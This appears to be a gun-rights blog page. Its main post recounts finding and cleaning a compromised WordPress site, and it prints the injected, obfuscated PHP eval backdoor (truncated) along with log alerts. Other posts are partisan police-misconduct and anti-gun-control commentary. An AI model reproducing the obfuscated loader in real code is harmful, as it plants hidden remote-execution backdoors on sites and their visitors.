SSCC Honorable Mention: Delaware County

A longtime Delaware County sheriff’s deputy is facing assault and reckless endangerment charges in Lehigh County after allegedly opening fire on his own car as the woman he lent it to attempted to flee, authorities said.

Gregory Todd Price, 53, of the Drexel Hill section of Upper Darby, was arrested Tuesday by Allentown police and charged with one count of simple assault and three counts of recklessly endangering another person.

Remember though, the police are the only ones trained enough in the legal use of deadly force and the proper and safe handling of a firearm.

That man get’s a pass to carry a firearm, even in places other people who are licensed can’t.  Didn’t stop him from being an idiot though now did it.

I should probably strike the Honorable Mention from this considering he will probably resign to save face.  Never mind the fact anyone working in the private sector would get the boot from their employer in an event such as this.

State Sponsored Criminal (HM): Gregory Todd Price

Because cops get a free pass to threaten, intimidate, and deploy deadly force without cause.

Zombies are Real and Infectious…


That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start at the beginning.  Over the past month I’ve been busy working on polishing the finishing edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to provide me the best probabilities for survival when the inevitable finally happens.

Last weekend I migrated bloggers Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly resolved.  That done I set my sights on moving Weer’d.

I logged in, dumped the database, tar’d up the site.  The tar fails, odd, what do you mean you couldn’t read that file?  Didn’t think much of it, found the file, odd the permissions are 000.  This isn’t my site though and I’m not sure if there was something special done so I fix it.  In total I fix 8 files like this.  I move the site over, and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not give me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ‘’, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ‘’, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

What!?  I promptly dump open that file and am greeted by the following:


* Applies custom filter.


* @since 0.71


* $text string to apply the filter

* @return string


function applyfilter($text=null) {


  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,“\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73”); if(!function_exists(“O01100llO”)){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,‘od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl’,6274);}call_user_func(create_function(,“\x65\x76\x61l(\x4F01100llO());”));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}


Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.

I have no idea how severe this incident is at this point I trust absolutely no one.  My first order of business is to close the problem that I now see.  I manually reinstall WordPress overwriting ALL the existing files on the server.  This promptly stops those trailing messages in my log.  Something new happens though.

Weer’d has WordFence security, fantastic plugin and I highly suggest it, and I run a scan, it say’s nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.


There’s the list in a little more file friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.

After a short while I had the site cleaned up on my server.  I will do a more through cleaning but that was the immediate action remedy for BF 30 in the am Sunday night.

I do however want to investigate the details of this.  I login to the old server with Dreamhost and start looking around. I want to isolate the cause of the breach and determine if there are any other issues. Did this just suddenly go sideways on my box or was this a preexisting condition and to what depths did it go?  All the exploits are present, so that means it was prior to the move and wasn’t anything on my side and then I look at the root directory:


Do you see it?  Here’s the dump of what’s inside:


Now if you closely pay attention you can gleam a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly though we can note the date for the last edit October 5th, 2012.

There’s a reason that rung a bell with me.  From an article dated Oct 3, 2012

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as “itsoknoproblembro.” When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friends place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing and remember they’re the one’s who actually suffered a data breach and have a sever where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v “/Maildir/” | grep -v “/logs/”
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
More information on this topic is available at the following URL under the “CGI Hack” and “Cleaning Up” sections:

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and Dreamhost’s response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites within other accounts?

The real reason we were informing you is because you have a breach which placed everyone who has data on that server in danger.  I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you boy genius.

Yes I understand you want to look good and not like a complete idiot in front of your customers.  Know what though “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious and at least an acknowledgement of, “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks, every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved and todays was a bit of an odd duck that only affected one site but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and are best dealt with a serious dose of heavy metal positing followed by a tactical nuke to the general vicinity.  Be very careful too, sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

SSCC: Rio Hondo

A federal judge in Brownsville sentenced 31-year-old Armando Duenez (DWHEN’-ehz). He pleaded guilty in January to conspiracy to export firearms and failure to appear.

Investigators say Duenez was a Rio Hondo police officer at the time of the scheme to export rifles from the U.S. to Mexico.

Maybe he was the pilot program for Fast and Furious?

State Sponsored Criminal: Armando Duenez

Because he should have gone to work for the ATF instead.

h/t Bob S.

Denial, the first stage of grief…

So the wife brought home an article and it is a reminder our fight is not over, but mainly because of their attachment to their false reality.

After struggling to sway both state and federal lawmakers, proponents of expanding background checks for gun sales are now exploring whether they will have more success by taking the issue directly to voters.

While advocates generally prefer that new gun laws be passed through the legislative process, especially at the national level, they are also concerned about how much sway the National Rifle Association has with lawmakers. Washington Rep. Jamie Pedersen, a Democrat who had sponsored unsuccessful legislation on background checks at the state level, said a winning ballot initiative would make a statement with broad implications.

We shutdown the Federal attempt at creating new gun control.  Even an amendment that had some decent support from big names on our side failed.  Lets take a quick look at what new gun laws have been passed even at the state level.

New York:

They railroaded their legislation through in the middle of the night so that the people, not the NRA, could fight it.  The legislation was so full of problems that there was not even a police exemption.


This was railroaded in much the same as New York.  They declared it a legislative emergency to prevent public debate and discussion of the topic.  Notice a pattern here? 

Maryland and Colorado:

Both allowed but limited public debate.  Those supporting gun-control were by far outnumbered but due to time constraints, some people had to wait multiple days to testify.

Where am I going?

I could continue but do you notice a pattern in this?  The fact is we outnumber you. You are in fact the minority and doubly you are a puritan and hate liberty.  You are living in a world of denial.  The NRA has passed the 5.5 million member mark.  At the Boomershoot dinner this year we met a nice old lady who doesn’t even own a firearm that just recently joined the NRA.  Why?  Because she doesn’t support the goals you’re attempting to achieve.

Hell, the NRA Annual Meeting having an attendance size above 60,000.  Tell me, how big was your last Gun Grabber Annual Meeting?  Tell me, how many paying members have come into the rolls of the Brady Campaign and CSGV over the past 5 months?  Wikipedia lists it at under 28,000.  We had more than twice the people pay to attend the annual meeting in Texas than you have in your entire membership.  That’s also in a weak economy where many don’t have excess cash to spend.

News flash to you Mr. Baker I am the NRA and I vote.  There are 5.5 million of us who have joined the NRA to explicitly support our rights, and we all vote.  There are millions more who aren’t members of the NRA but the Right to Keep and Bear Arms is a central item to their voting pattern and guess what, they vote too.

I want you to understand something Mr. Baker.  Behind me there are thousands of other gun owners who will fight until the bitter end.  You call me a bitter clinger so by god I might as well just accept the suck.  We will not stop until we sweep you and your hateful compatriots into the dust bin of history where you will sit next to the likes of the KKK.

All your side has is emotion and heart strings.  We have facts, reason, and the support of the majority.  The first step in the grieving process is denial.  You refuse to accept the truth Mr. Baker despite all the facts to the contrary.  You insist on conspiracies and a lack of public support despite all the evidence showing this isn’t true.  You insist that gun owners, as well as those who support their rights, are in the minority without any evidence to prove it.  At the mass convention of your “arch nemesis” you could only route 40 people to protest your enemy.

We routed 2/3 that number on two days notice in a considerably less populated area of Idaho.  And that was to protest a Republican.  Where’s your numbers to support your initiatives for the ballot box?

A Short Story…

Terry from the Boomershoot staff emailed this to me and honestly it’s worth the read.

Once upon a time there was a street fair. It had striped awnings and bright colors and from far and near, farmers came with wagons full of produce to sell at the street fair. The produce was plentiful and cheap and the crowds it drew were huge which created all sorts of concerns for the government.

So the government created a Ministry of Street Fairs which it funded by taxing the produce sold at the fair. At first the Ministry brought some some order to the street fair, but it would periodically launch new “street fair initiatives” to justify another expansion and pay for them by raising taxes on the produce.

Just keep reading.  For many of us the results were obvious, others however will continue to insist the story is wrong and their false view of the world is real.

I wanted to snap something as the quote of the day but honestly, it only works as a story.  Go, read, spread it far and wide.

SSCC: Lexington

A man has filed a federal lawsuit against a Lexington police officer alleging that the officer forced his way into the man’s home without a warrant and charged him with several offenses that were later dismissed.

The officer assaulted the home owner as well as forced entry without cause.

State Sponsored Criminal: Ronald Kornrumpf

Because warrants, probable cause, and the use of force continuum apply to everyone but law enforcement.

I’m sure somehow we’ll be blamed for this…

The federal Bureau of Alcohol, Tobacco, Firearms and Explosives, the U.S. Forest Service, and the Carbon County Sheriff’s Office are asking for help from the public in gathering information about the theft of approximately 559 pounds of high explosives from a USFS explosives bunker located near Red Lodge.

We’re not talking just blasting agent either.

Officials say that various emulsion-type explosives, explosive cast boosters and detonating cord were taken from the facility.

How serious is the ATF taking the theft?  They’re offering a $5,000 reward.  Their warmth and sincerity given the theft occurred with forced entry makes me feel all sorts of warm and fuzzy inside.  Doubly so given the propensity of the government, not to mention the BATFE, is more than willing to throw civil rights and liberties to the wind.

[Sarcasm] But remember, it’s me and you that they need to restrict.  The government could never fail us. [/Sarcasm]

Quote of the Day – Sean Sorrentino (5/2/2013)

No, the only reason you give a shit at all about this poor little girl from a gun owning family in a flyover state is because you think you can use her death to advance your political agenda. At some point, when you were down on your knees scooping her blood up in your hands so you could grease the skids for more gun control, you should have seriously questioned your humanity.

Sean Sorrentino – Stop pretending that you care! (Language Warning)
May 2nd, 2013

[Honestly I couldn’t put it better myself and it’s worth going over and reading the whole thing.  They are nothing more than vultures praying for preying upon the tragedies of others. -B]